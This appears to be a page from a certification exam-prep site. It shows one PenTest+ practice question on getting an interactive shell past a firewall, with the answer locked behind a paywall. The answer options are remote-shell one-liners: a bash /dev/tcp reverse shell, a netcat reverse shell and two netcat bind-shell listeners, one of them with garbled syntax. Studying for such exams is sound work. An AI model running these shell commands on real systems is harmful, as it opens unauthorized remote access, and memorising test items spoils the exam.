CompTIACompTIA
PT0-002 · Question #462
PT0-002 Question #462: Real Exam Question with Answer & Explanation
Sign in or unlock PT0-002 to reveal the answer and full explanation for question #462. The question stem and answer options stay visible for context.
Post-exploitation and lateral movement
Question
After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic. Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?
Options
- Abash -i >& /dev/tcp 8443 0>&l
- Bnc -e host 8443 /bin/bash
- Cnc -vlp 8443 /bin/bash
- Dnc -vp 8443 /bin/bash
Unlock PT0-002 to see the answer
You've previewed enough free PT0-002 questions. Unlock PT0-002 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.
Topics
#Bind shell#Netcat#Post-exploitation#Firewall bypass